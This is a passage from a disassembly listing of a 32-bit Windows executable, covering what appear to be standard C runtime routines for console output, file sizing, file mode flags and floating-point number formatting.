loc_410848: ; CODE XREF: sub_4106A8+CAj
lea esp, [ebp-40h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402ADC
leave
retn
sub_4106A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410860 proc near ; CODE XREF: sub_40C307+F3p
; sub_40C307+1B1p ...
arg_0 = byte ptr 4
push ecx
lea ecx, [esp+4+arg_0]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_4117B0
sub_410860 endp
; ---------------------------------------------------------------------------
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_4117B0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41088C proc near ; CODE XREF: sub_40D20A+2A1p
; sub_40D20A+2C1p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
xor esi, esi
cmp dword_424218, esi
jz short loc_4108F5
cmp dword_424224, 0FFFFFFFEh
jnz short loc_4108B5
call sub_4117DB
loc_4108B5: ; CODE XREF: sub_41088C+22j
mov eax, dword_424224
cmp eax, 0FFFFFFFFh
jnz short loc_4108C5
loc_4108BF: ; CODE XREF: sub_41088C+56j
; sub_41088C+61j ...
or ax, 0FFFFh
jmp short loc_410935
; ---------------------------------------------------------------------------
loc_4108C5: ; CODE XREF: sub_41088C+31j
push esi
lea ecx, [ebp+var_10]
push ecx
push 1
lea ecx, [ebp+arg_0]
push ecx
push eax
call ds:off_41D0A8
test eax, eax
jnz short loc_410942
cmp dword_424218, 2
jnz short loc_4108BF
call ds:dword_41D0EC ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_4108BF
mov dword_424218, esi
loc_4108F5: ; CODE XREF: sub_41088C+19j
push esi
push esi
push 5
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push esi
call ds:off_41D0AC
push eax
call ds:dword_41D134 ; WideCharToMultiByte
mov ecx, dword_424224
cmp ecx, 0FFFFFFFFh
jz short loc_4108BF
push esi
lea edx, [ebp+var_10]
push edx
push eax
lea eax, [ebp+var_C]
push eax
push ecx
call ds:off_41D0B0
test eax, eax
jz short loc_4108BF
loc_410931: ; CODE XREF: sub_41088C+C0j
mov ax, [ebp+arg_0]
loc_410935: ; CODE XREF: sub_41088C+37j
mov ecx, [ebp+var_4]
xor ecx, ebp
pop esi
call sub_402ADC
leave
retn
; ---------------------------------------------------------------------------
loc_410942: ; CODE XREF: sub_41088C+4Dj
mov dword_424218, 1
jmp short loc_410931
sub_41088C endp
; ---------------------------------------------------------------------------
push 2
call sub_407C0D
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410957 proc near ; CODE XREF: sub_40E422+36Fp
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor ebx, ebx
push 1
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_40D06E
mov [ebp+var_18], eax
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_14], edx
jz short loc_4109DD
push 2
push ebx
push ebx
push [ebp+arg_0]
call sub_40D06E
mov ecx, eax
and ecx, edx
add esp, 10h
cmp ecx, 0FFFFFFFFh
jz short loc_4109DD
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
sub esi, eax
sbb edi, edx
js loc_410A72
jg short loc_4109B6
cmp esi, ebx
jbe loc_410A72
loc_4109B6: ; CODE XREF: sub_410957+55j
mov ebx, 1000h
push ebx
push 8
call ds:dword_41D0FC ; GetProcessHeap
push eax
call ds:dword_41D110 ; RtlAllocateHeap
test eax, eax
mov [ebp+var_4], eax
jnz short loc_4109E9
call sub_405B83
mov dword ptr [eax], 0Ch
loc_4109DD: ; CODE XREF: sub_410957+2Bj
; sub_410957+43j ...
call sub_405B83
mov eax, [eax]
loc_4109E4: ; CODE XREF: sub_410957+1AFj
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4109E9: ; CODE XREF: sub_410957+79j
push 8000h
push [ebp+arg_0]
call sub_410B7D
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_4109FB: ; CODE XREF: sub_410957+CFj
; sub_410957+D3j
test edi, edi
jl short loc_410A09
jg short loc_410A05
cmp esi, ebx
jb short loc_410A09
loc_410A05: ; CODE XREF: sub_410957+A8j
mov eax, ebx
jmp short loc_410A0B
; ---------------------------------------------------------------------------
loc_410A09: ; CODE XREF: sub_410957+A6j
; sub_410957+ACj
mov eax, esi
loc_410A0B: ; CODE XREF: sub_410957+B0j
push eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40D20A
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_410A55
cdq
sub esi, eax
sbb edi, edx
js short loc_410A2C
jg short loc_4109FB
test esi, esi
ja short loc_4109FB
loc_410A2C: ; CODE XREF: sub_410957+CDj
mov esi, [ebp+var_10]
loc_410A2F: ; CODE XREF: sub_410957+119j
push [ebp+var_8]
push [ebp+arg_0]
call sub_410B7D
pop ecx
pop ecx
push [ebp+var_4]
push 0
call ds:dword_41D0FC ; GetProcessHeap
push eax
call ds:dword_41D108 ; RtlFreeHeap
xor ebx, ebx
jmp loc_410ADB
; ---------------------------------------------------------------------------
loc_410A55: ; CODE XREF: sub_410957+C6j
call sub_405B96
cmp dword ptr [eax], 5
jnz short loc_410A6A
call sub_405B83
mov dword ptr [eax], 0Dh
loc_410A6A: ; CODE XREF: sub_410957+106j
or esi, 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_410A2F
; ---------------------------------------------------------------------------
loc_410A72: ; CODE XREF: sub_410957+4Fj
; sub_410957+59j
cmp edi, ebx
jg short loc_410AE7
jl short loc_410A7C
cmp esi, ebx
jnb short loc_410AE7
loc_410A7C: ; CODE XREF: sub_410957+11Fj
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D06E
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_4109DD
push [ebp+arg_0]
call sub_40F12D
pop ecx
push eax
call ds:off_41D0A4
neg eax
sbb eax, eax
neg eax
dec eax
cdq
mov [ebp+var_10], eax
and eax, edx
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], edx
jnz short loc_410AE7
call sub_405B83
mov dword ptr [eax], 0Dh
call sub_405B96
mov esi, eax
call ds:dword_41D0EC ; RtlGetLastWin32Error
mov [esi], eax
mov esi, [ebp+var_10]
loc_410ADB: ; CODE XREF: sub_410957+F9j
and esi, [ebp+var_C]
cmp esi, 0FFFFFFFFh
jz loc_4109DD
loc_410AE7: ; CODE XREF: sub_410957+11Dj
; sub_410957+123j ...
push ebx
push [ebp+var_14]
push [ebp+var_18]
push [ebp+arg_0]
call sub_40D06E
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_4109DD
xor eax, eax
jmp loc_4109E4
sub_410957 endp
; =============== S U B R O U T I N E =======================================
sub_410B0B proc near ; CODE XREF: sub_40E422+322p
; sub_40E422+37Fp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_40F12D
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_410B2C
call sub_405B83
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_410B2C: ; CODE XREF: sub_410B0B+Fj
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:off_41D074
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_410B4D
call ds:dword_41D0EC ; RtlGetLastWin32Error
jmp short loc_410B4F
; ---------------------------------------------------------------------------
loc_410B4D: ; CODE XREF: sub_410B0B+38j
xor eax, eax
loc_410B4F: ; CODE XREF: sub_410B0B+40j
test eax, eax
jz short loc_410B5F
push eax
call sub_405BA9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_410B7A
; ---------------------------------------------------------------------------
loc_410B5F: ; CODE XREF: sub_410B0B+46j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, dword_435820[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_410B7A: ; CODE XREF: sub_410B0B+52j
pop edi
pop esi
retn
sub_410B0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B7D proc near ; CODE XREF: sub_410957+9Ap
; sub_410957+DEp
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov eax, edx
sar eax, 5
and edx, 1Fh
imul edx, 28h
push ebx
mov ebx, [ebp+arg_4]
push esi
lea esi, ds:435820h[eax*4]
mov eax, [esi]
lea ecx, [eax+edx]
movzx eax, byte ptr [ecx+4]
and eax, 80h
mov [ebp+arg_0], eax
mov al, [ecx+24h]
add al, al
movsx eax, al
push edi
mov edi, 4000h
sar eax, 1
cmp ebx, edi
jz short loc_410C0F
cmp ebx, 8000h
jz short loc_410C09
cmp ebx, 10000h
jz short loc_410BF5
cmp ebx, 20000h
jz short loc_410BF5
cmp ebx, 40000h
jnz short loc_410C1C
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 81h
or dl, 1
loc_410BF1: ; CODE XREF: sub_410B7D+8Aj
mov [ecx], dl
jmp short loc_410C1C
; ---------------------------------------------------------------------------
loc_410BF5: ; CODE XREF: sub_410B7D+50j
; sub_410B7D+58j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 82h
or dl, 2
jmp short loc_410BF1
; ---------------------------------------------------------------------------
loc_410C09: ; CODE XREF: sub_410B7D+48j
and byte ptr [ecx+4], 7Fh
jmp short loc_410C1C
; ---------------------------------------------------------------------------
loc_410C0F: ; CODE XREF: sub_410B7D+40j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
and byte ptr [ecx], 80h
loc_410C1C: ; CODE XREF: sub_410B7D+60j
; sub_410B7D+76j ...
cmp [ebp+arg_0], 0
jnz short loc_410C29
mov eax, 8000h
jmp short loc_410C34
; ---------------------------------------------------------------------------
loc_410C29: ; CODE XREF: sub_410B7D+A3j
neg eax
sbb eax, eax
and eax, 0C000h
add eax, edi
loc_410C34: ; CODE XREF: sub_410B7D+AAj
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410B7D endp
; =============== S U B R O U T I N E =======================================
sub_410C39 proc near ; CODE XREF: sub_40E422+40p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_410C61
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_410C61: ; CODE XREF: sub_410C39+9j
mov ecx, dword_4280C0
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_410C39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C6D proc near ; CODE XREF: sub_410DE8+6p
; DATA XREF: sub_40FABC+55o ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_402AEB
mov esi, [ebp+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_405B21
cmp eax, 65h
jmp short loc_410C9C
; ---------------------------------------------------------------------------
loc_410C90: ; CODE XREF: sub_410C6D+30j
inc esi
movzx eax, byte ptr [esi]
push eax
call sub_40F52F
test eax, eax
loc_410C9C: ; CODE XREF: sub_410C6D+21j
pop ecx
jnz short loc_410C90
movsx eax, byte ptr [esi]
push eax
call sub_405B21
cmp eax, 78h
pop ecx
jnz short loc_410CB0
inc esi
inc esi
loc_410CB0: ; CODE XREF: sub_410C6D+3Fj
mov ecx, [ebp+var_10]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
mov al, [esi]
mov cl, [ecx]
mov [esi], cl
inc esi
loc_410CC2: ; CODE XREF: sub_410C6D+60j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_410CC2
cmp [ebp+var_4], cl
pop esi
jz short locret_410CDC
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_410CDC: ; CODE XREF: sub_410C6D+66j
leave
retn
sub_410C6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CDE proc near ; CODE XREF: sub_410DF6+6p
; DATA XREF: sub_40FABC+4Bo ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_402AEB
mov eax, [ebp+arg_0]
mov cl, [eax]
test cl, cl
mov esi, [ebp+var_10]
jz short loc_410D11
mov edx, [esi+0BCh]
mov edx, [edx]
mov dl, [edx]
loc_410D06: ; CODE XREF: sub_410CDE+31j
cmp cl, dl
jz short loc_410D11
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_410D06
loc_410D11: ; CODE XREF: sub_410CDE+1Cj
; sub_410CDE+2Aj
mov cl, [eax]
inc eax
test cl, cl
jz short loc_410D4E
jmp short loc_410D25
; ---------------------------------------------------------------------------
loc_410D1A: ; CODE XREF: sub_410CDE+4Bj
cmp cl, 65h
jz short loc_410D2B
cmp cl, 45h
jz short loc_410D2B
inc eax
loc_410D25: ; CODE XREF: sub_410CDE+3Aj
mov cl, [eax]
test cl, cl
jnz short loc_410D1A
loc_410D2B: ; CODE XREF: sub_410CDE+3Fj
; sub_410CDE+44j
mov edx, eax
loc_410D2D: ; CODE XREF: sub_410CDE+53j
dec eax
cmp byte ptr [eax], 30h
jz short loc_410D2D
mov ecx, [esi+0BCh]
mov ecx, [ecx]
push ebx
mov bl, [eax]
cmp bl, [ecx]
pop ebx
jnz short loc_410D44
dec eax
loc_410D44: ; CODE XREF: sub_410CDE+63j
; sub_410CDE+6Ej
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_410D44
loc_410D4E: ; CODE XREF: sub_410CDE+38j
cmp [ebp+var_4], 0
pop esi
jz short locret_410D5C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
locret_410D5C: ; CODE XREF: sub_410CDE+75j
leave
retn
sub_410CDE endp
; ---------------------------------------------------------------------------
word_410D5E dw 0EED9h ; DATA XREF: sub_40FABC+28o
; .data:off_423F90o
dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410D74 proc near ; CODE XREF: sub_410DB4+Ep
; DATA XREF: sub_40FABC+41o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_C]
push [ebp+arg_8]
jz short loc_410D9E
lea eax, [ebp+var_8]
push eax
call sub_41185D
mov ecx, [ebp+var_8]
mov eax, [ebp+arg_4]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
jmp short loc_410DAF
; ---------------------------------------------------------------------------
loc_410D9E: ; CODE XREF: sub_410D74+Fj
lea eax, [ebp+arg_0]
push eax
call sub_411903
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_410DAF: ; CODE XREF: sub_410D74+28j
add esp, 0Ch
leave
retn
sub_410D74 endp
; =============== S U B R O U T I N E =======================================
sub_410DB4 proc near ; DATA XREF: sub_40FABC+14o
; .data:off_423F88o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_410D74
add esp, 10h
retn
sub_410DB4 endp
; =============== S U B R O U T I N E =======================================
sub_410DCB proc near ; CODE XREF: sub_410E04+88p
; sub_4113CE+8Ap ...
test edi, edi
push esi
mov esi, eax
jz short loc_410DE6
push esi
call sub_4044E0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_407720
add esp, 10h
loc_410DE6: ; CODE XREF: sub_410DCB+5j
pop esi
retn
sub_410DCB endp
; =============== S U B R O U T I N E =======================================
sub_410DE8 proc near ; DATA XREF: sub_40FABC+1Eo
; .data:off_423F8Co
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_410C6D
pop ecx
pop ecx
retn
sub_410DE8 endp
; =============== S U B R O U T I N E =======================================
sub_410DF6 proc near ; DATA XREF: sub_40FABC+Ao
; .data:off_423F84o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_410CDE
pop ecx
pop ecx
retn
sub_410DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410E04 proc near ; CODE XREF: sub_410F71+B7p
; sub_41157C+E1p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_10]
mov ebx, eax
call sub_402AEB
xor esi, esi
cmp ebx, esi
jnz short loc_410E4B
loc_410E20: ; CODE XREF: sub_410E04+4Aj
call sub_405B83
push 16h
loc_410E27: ; CODE XREF: sub_410E04+67j
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_403305
add esp, 14h
cmp [ebp+var_4], 0
jz short loc_410E44
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410E44: ; CODE XREF: sub_410E04+37j
mov eax, edi
jmp loc_410F6C
; ---------------------------------------------------------------------------
loc_410E4B: ; CODE XREF: sub_410E04+1Aj
cmp [ebp+arg_0], esi
jbe short loc_410E20
cmp [ebp+arg_4], esi
jle short loc_410E5A
mov eax, [ebp+arg_4]
jmp short loc_410E5C
; ---------------------------------------------------------------------------
loc_410E5A: ; CODE XREF: sub_410E04+4Fj
xor eax, eax
loc_410E5C: ; CODE XREF: sub_410E04+54j
add eax, 9
cmp [ebp+arg_0], eax
ja short loc_410E6D
call sub_405B83
push 22h
jmp short loc_410E27
; ---------------------------------------------------------------------------
loc_410E6D: ; CODE XREF: sub_410E04+5Ej
cmp [ebp+arg_10], 0
jz short loc_410E91
mov edx, [ebp+arg_C]
xor eax, eax
cmp [ebp+arg_4], esi
setnle al
xor ecx, ecx
cmp dword ptr [edx], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_410DCB
loc_410E91: ; CODE XREF: sub_410E04+6Dj
mov edi, [ebp+arg_C]
cmp dword ptr [edi], 2Dh
mov esi, ebx
jnz short loc_410EA1
mov byte ptr [ebx], 2Dh
lea esi, [ebx+1]
loc_410EA1: ; CODE XREF: sub_410E04+95j
cmp [ebp+arg_4], 0
jle short loc_410EBF
lea eax, [esi+1]
mov cl, [eax]
mov [esi], cl
mov esi, eax
mov eax, [ebp+var_10]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
mov [esi], al
loc_410EBF: ; CODE XREF: sub_410E04+A1j
xor eax, eax
cmp [ebp+arg_10], al
setz al
add eax, [ebp+arg_4]
add esi, eax
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_410ED7
or ebx, 0FFFFFFFFh
jmp short loc_410EDC
; ---------------------------------------------------------------------------
loc_410ED7: ; CODE XREF: sub_410E04+CCj
sub ebx, esi
add ebx, [ebp+arg_0]
loc_410EDC: ; CODE XREF: sub_410E04+D1j
push offset aE000 ; "e+000"
push ebx
push esi
call sub_407A85
add esp, 0Ch
xor ebx, ebx
test eax, eax
jz short loc_410EFE
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403209
add esp, 14h
loc_410EFE: ; CODE XREF: sub_410E04+EBj
cmp [ebp+arg_8], ebx
lea ecx, [esi+2]
jz short loc_410F09
mov byte ptr [esi], 45h
loc_410F09: ; CODE XREF: sub_410E04+100j
mov eax, [edi+0Ch]
inc esi
cmp byte ptr [eax], 30h
jz short loc_410F40
mov eax, [edi+4]
dec eax
jns short loc_410F1D
neg eax
mov byte ptr [esi], 2Dh
loc_410F1D: ; CODE XREF: sub_410E04+112j
inc esi
cmp eax, 64h
jl short loc_410F2D
cdq
push 64h
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410F2D: ; CODE XREF: sub_410E04+11Dj
inc esi
cmp eax, 0Ah
jl short loc_410F3D
cdq
push 0Ah
pop edi
idiv edi
add [esi], al
mov eax, edx
loc_410F3D: ; CODE XREF: sub_410E04+12Dj
add [esi+1], al
loc_410F40: ; CODE XREF: sub_410E04+10Cj
test byte_4280C4, 1
jz short loc_410F5D
cmp byte ptr [ecx], 30h
jnz short loc_410F5D
push 3
lea eax, [ecx+1]
push eax
push ecx
call sub_407720
add esp, 0Ch
loc_410F5D: ; CODE XREF: sub_410E04+143j
; sub_410E04+148j
cmp [ebp+var_4], 0
jz short loc_410F6A
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_410F6A: ; CODE XREF: sub_410E04+15Dj
xor eax, eax
loc_410F6C: ; CODE XREF: sub_410E04+42j
pop edi
pop esi
pop ebx
leave
retn
sub_410E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F71 proc near ; CODE XREF: sub_41103F+14p
; sub_411674+7Cp
var_2C = dword ptr -2Ch
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411B21
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_410FC1
loc_410FA9: ; CODE XREF: sub_410F71+55j
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_403305
add esp, 14h
mov eax, esi
jmp short loc_411030
; ---------------------------------------------------------------------------
loc_410FC1: ; CODE XREF: sub_410F71+36j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_410FA9
cmp eax, 0FFFFFFFFh
mov esi, [ebp+arg_C]
jnz short loc_410FD5
or eax, 0FFFFFFFFh
jmp short loc_410FE9
; ---------------------------------------------------------------------------
loc_410FD5: ; CODE XREF: sub_410F71+5Dj
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
xor ecx, ecx
cmp esi, ebx
setnle cl
sub eax, ecx
loc_410FE9: ; CODE XREF: sub_410F71+62j
lea ecx, [ebp+var_2C]
push ecx
lea ecx, [esi+1]
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
xor ecx, ecx
cmp esi, ebx
setnle cl
add eax, edi
add ecx, eax
push ecx
call sub_4119A9
add esp, 10h
cmp eax, ebx
jz short loc_411017
mov [edi], bl
jmp short loc_411030
; ---------------------------------------------------------------------------
loc_411017: ; CODE XREF: sub_410F71+A0j
push [ebp+arg_14]
lea eax, [ebp+var_2C]
push ebx
push eax
push [ebp+arg_10]
mov eax, edi
push esi
push [ebp+arg_8]
call sub_410E04
add esp, 18h
loc_411030: ; CODE XREF: sub_410F71+4Ej
; sub_410F71+A4j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_410F71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41103F proc near ; CODE XREF: sub_41105D+BDp
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410F71
add esp, 18h
pop ebp
retn
sub_41103F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41105D proc near ; CODE XREF: sub_411674+63p
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
push [ebp+arg_14]
lea ecx, [ebp+var_24]
mov [ebp+var_14], 3FFh
xor edi, edi
mov [ebp+var_4], 30h
call sub_402AEB
cmp [ebp+arg_C], edi
jge short loc_411088
mov [ebp+arg_C], edi
loc_411088: ; CODE XREF: sub_41105D+26j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_4110BA
loc_41108F: ; CODE XREF: sub_41105D+60j
call sub_405B83
push 16h
loc_411096: ; CODE XREF: sub_41105D+77j
pop esi
push edi
push edi
push edi
push edi
push edi
mov [eax], esi
call sub_403305
add esp, 14h
cmp [ebp+var_18], 0
jz short loc_4110B3
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4110B3: ; CODE XREF: sub_41105D+4Dj
mov eax, esi
jmp loc_4113CA
; ---------------------------------------------------------------------------
loc_4110BA: ; CODE XREF: sub_41105D+30j
cmp [ebp+arg_8], edi
jbe short loc_41108F
mov eax, [ebp+arg_C]
add eax, 0Bh
cmp [ebp+arg_8], eax
mov byte ptr [esi], 0
ja short loc_4110D6
call sub_405B83
push 22h
jmp short loc_411096
; ---------------------------------------------------------------------------
loc_4110D6: ; CODE XREF: sub_41105D+6Ej
mov edi, [ebp+arg_0]
mov eax, [edi]
mov [ebp+var_C], eax
mov eax, [edi+4]
mov ecx, eax
shr ecx, 14h
mov edx, 7FFh
push ebx
and ecx, edx
xor ebx, ebx
cmp ecx, edx
jnz loc_411188
test ebx, ebx
jnz loc_411188
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
jnz short loc_41110C
or eax, eax
jmp short loc_41110F
; ---------------------------------------------------------------------------
loc_41110C: ; CODE XREF: sub_41105D+A9j
add eax, 0FFFFFFFEh
loc_41110F: ; CODE XREF: sub_41105D+ADj
push 0
push [ebp+arg_C]
lea ebx, [esi+2]
push eax
push ebx
push edi
call sub_41103F
add esp, 14h
test eax, eax
jz short loc_41113F
cmp [ebp+var_18], 0
mov byte ptr [esi], 0
jz loc_4113C9
mov ecx, [ebp+var_1C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_4113C9
; ---------------------------------------------------------------------------
loc_41113F: ; CODE XREF: sub_41105D+C7j
cmp byte ptr [ebx], 2Dh
jnz short loc_411148
mov byte ptr [esi], 2Dh
inc esi
loc_411148: ; CODE XREF: sub_41105D+E5j
mov byte ptr [esi], 30h
inc esi
cmp [ebp+arg_10], 0
push 65h
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
inc esi
push esi
call sub_411830
test eax, eax
pop ecx
pop ecx
jz loc_4113BA
cmp [ebp+arg_10], 0
setz cl
dec cl
and cl, 0E0h
add cl, 70h
mov [eax], cl
mov byte ptr [eax+3], 0
jmp loc_4113BA
; ---------------------------------------------------------------------------
loc_411188: ; CODE XREF: sub_41105D+95j
; sub_41105D+9Dj
and eax, 80000000h
xor ecx, ecx
or ecx, eax
jz short loc_411197
mov byte ptr [esi], 2Dh
inc esi
loc_411197: ; CODE XREF: sub_41105D+134j
mov ebx, [ebp+arg_10]
mov byte ptr [esi], 30h
inc esi
test ebx, ebx
setz al
dec al
and al, 0E0h
add al, 78h
mov [esi], al
mov ecx, [edi+4]
inc esi
neg ebx
sbb ebx, ebx
and ebx, 0FFFFFFE0h
and ecx, 7FF00000h
xor eax, eax
add ebx, 27h
xor edx, edx
or eax, ecx
jnz short loc_4111E8
mov byte ptr [esi], 30h
mov ecx, [edi+4]
mov eax, [edi]
and ecx, 0FFFFFh
inc esi
or eax, ecx
jnz short loc_4111DF
mov [ebp+var_14], edx
jmp short loc_4111EC
